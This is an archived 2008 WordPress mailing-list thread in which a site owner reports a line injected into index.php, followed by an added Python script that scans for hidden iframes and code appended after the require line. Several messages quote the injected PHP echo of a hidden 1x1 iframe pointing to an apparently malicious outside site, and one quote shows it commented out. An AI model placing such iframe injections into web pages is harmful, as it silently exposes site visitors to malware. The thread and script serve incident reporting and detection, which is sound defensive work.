[wp-hackers] Re: XSS vuln in wordpress 2.7 ?

baker god.dreams at gmail.com
Mon Dec 22 19:26:31 GMT 2008


Just to chime in on the fun, you're not the only one, as a quick Google
search pulls up a lot of people with similar posts.

http://www.networksolutions.com/whois-search/thedeadpit.com

It also shows the (supposed) owner is in Estonia; oddly enough,
I've seen a lot of failed hack attempts on my site coming from Estonia
(I think, or maybe it was Algeria?).

Do you have mod_security enabled? No luck on pulling down the
offender's IP, and the site itself seems to do nothing but host a
virus...

Best of luck turning this around...

-kb

> ------------------------------
>
> Message: 7
> Date: Mon, 22 Dec 2008 20:39:49 +0200
> From: madalin <niladam at gmail.com>
> Subject: Re: [wp-hackers] XSS vuln in wordpress 2.7 ?
> To: wp-hackers at lists.automattic.com
> Message-ID:
>        <df809b110812221039y29f116f1k5238dfb209d3f30a at mail.gmail.com>
> Content-Type: text/plain; charset=UTF-8
>
> Yes, that's exactly what I am saying. Here is my index.php:
>
> <?php
> /**
>  * Front to the WordPress application. This file doesn't do anything, but loads
>  * wp-blog-header.php which does and tells WordPress to load the theme.
>  *
>  * @package WordPress
>  */
>
> /**
>  * Tells WordPress to load the WordPress theme and output it.
>  *
>  * @var bool
>  */
> define('WP_USE_THEMES', true);
>
> /** Loads the WordPress Environment and Template */
> require('./wp-blog-header.php');
>
> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
> ?>
>
>
>
> I've commented out the line so I can keep it for future investigations.
>
> Our passwords have NOT been compromised, as the only logins are from my
> host and my friend's host. It could be an older version of a plugin,
> though.
>
> However, I had to report this as maybe someone will encounter the same
> problem.
>
> Thanks.
>
> On Mon, Dec 22, 2008 at 8:36 PM, Stephen Rider
> <wp-hackers at striderweb.com> wrote:
>> Well, wait.  he said:  "i found [it in] my blog's index.php (not theme's
>> index.php)"
>>
>> Does this mean it shows up in the final rendered page, but not in the
>> theme's file?  In that case, it's being added dynamically.  The link is not
>> written in the theme.
>>
>> Just trying to clarify.  I'm no security guru... (IANASG)
>>
>> Stephen
>>
>> On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
>>
>>> If the file is writable for the webserver and file access is enabled on
>>> the webserver: yes.
>>
>>> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>>>
>>>> Wow. That's nasty, and malicious. Could a plugin do that?
>>>>
>>>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>>>
>>>>> For some reason I found my blog's index.php (not the theme's index.php)
>>>>> with the following piece of code right before the ?>
>>>>>
>>>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>>>
>>>>> I tried looking at the logs. No luck. The file's permissions look like
>>>>> this:
>>>>>
>>>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>>>>> /home/madalin/www/index.php
>>
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>
>
>



-- 
Keith Baker
grand central: (614) 654-4296
linkedin: http://www.linkedin.com/in/keithbaker
twitter: http://www.twitter.com/ikeif
blog: http://ikeif.net
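
Since the thread never gets to a concrete way of spotting this kind of tampering, here is a small triage helper written for this archive page. It is an added example, not code from the thread, from WordPress, or from mod_security. It checks an index.php for two things the thread turns on: a hidden 1x1 iframe, and any executable code after the `require('./wp-blog-header.php');` line, which in a stock WordPress front controller is the last statement. It also answers Joost's "is the file writable for the webserver" question from the `-rw-r--r-- madalin madalin` listing: a process running as the file owner (e.g. PHP under suPHP or CGI as the account user) can write it, a separate webserver user cannot. The sample file contents, the `example.invalid` domain standing in for the real one, and the uid/gid numbers are all constructed for the example.

```python
"""Triage helper for a possibly tampered WordPress index.php (added example)."""
import re
import stat
from typing import Dict, List, Tuple

# Constructed sample inputs. The domain is a placeholder, not the one from the thread.
SAMPLE_INFECTED = '''<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
echo "<iframe src=\\"http://example.invalid/?click=0\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";
?>
'''
# The same file after the owner commented the line out, as madalin did.
SAMPLE_COMMENTED = SAMPLE_INFECTED.replace('echo "<iframe', '// echo "<iframe')
SAMPLE_CLEAN = '''<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?>
'''

# An iframe made invisible: tiny dimensions or hidden/none styling.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*?(?:visibility\s*:\s*hidden|display\s*:\s*none|"
    r"\bwidth\s*=\s*[\"']?[01]\b|\bheight\s*=\s*[\"']?[01]\b)",
    re.IGNORECASE | re.DOTALL,
)
# The last statement of a stock index.php; anything executable after it was added.
REQUIRE_LINE = re.compile(r"require\s*\(?\s*['\"]\./wp-blog-header\.php['\"]\s*\)?\s*;")
# Blank lines, comments, docblock continuation lines and a bare closing tag are not code.
COMMENT_OR_BLANK = re.compile(r"^\s*(?:$|//|#|/\*|\*|\?>\s*$)")


def find_hidden_iframes(source: str) -> List[str]:
    """Return every hidden-iframe fragment found anywhere in the file text."""
    return [m.group(0) for m in HIDDEN_IFRAME.finditer(source)]


def find_trailing_code(source: str) -> List[Tuple[int, str]]:
    """Return (line_no, text) for executable lines after the wp-blog-header require."""
    lines = source.splitlines()
    start = None
    for i, line in enumerate(lines):
        if REQUIRE_LINE.search(line):
            start = i + 1
    if start is None:
        return []
    return [(i + 1, line) for i, line in enumerate(lines)
            if i >= start and not COMMENT_OR_BLANK.match(line)]


def scan_index_php(source: str) -> Dict[str, object]:
    """Combine both checks into one verdict for a single file's contents."""
    iframes = find_hidden_iframes(source)
    trailing = find_trailing_code(source)
    return {"hidden_iframes": iframes, "trailing_code": trailing,
            "suspicious": bool(iframes or trailing)}


def parse_ls_mode(perm: str) -> int:
    """Convert an ls -l permission string such as '-rw-r--r--' to mode bits."""
    flags = (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
             stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
             stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH)
    mode = 0
    for ch, flag in zip(perm[1:10], flags):
        if ch != "-":
            mode |= flag
    return mode


def writable_by(mode: int, file_uid: int, file_gid: int, uid: int, gid: int) -> bool:
    """Could a process running as uid/gid write a file with this owner and mode?
    Uses the Unix rule: owner bits if uid matches, else group bits, else other."""
    if uid == 0:
        return True
    if uid == file_uid:
        return bool(mode & stat.S_IWUSR)
    if gid == file_gid:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    for name, src in (("infected", SAMPLE_INFECTED), ("commented", SAMPLE_COMMENTED),
                      ("clean", SAMPLE_CLEAN)):
        print(name, scan_index_php(src))
    mode = parse_ls_mode("-rw-r--r--")
    # Constructed uids: 1000 for the account owner, 33 for a separate webserver user.
    print("owner-run PHP can write:", writable_by(mode, 1000, 1000, 1000, 1000))
    print("separate www user can write:", writable_by(mode, 1000, 1000, 33, 33))
```

The two checks are deliberately independent: on the commented-out copy madalin kept, the iframe pattern still fires (the string is still in the file) while the trailing-code check is quiet, which is the right answer for a file the owner has neutralised but not cleaned. Running this over every `index.php` under a document root, and comparing each against the distribution copy's hash, gives the log-free evidence the thread was missing.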

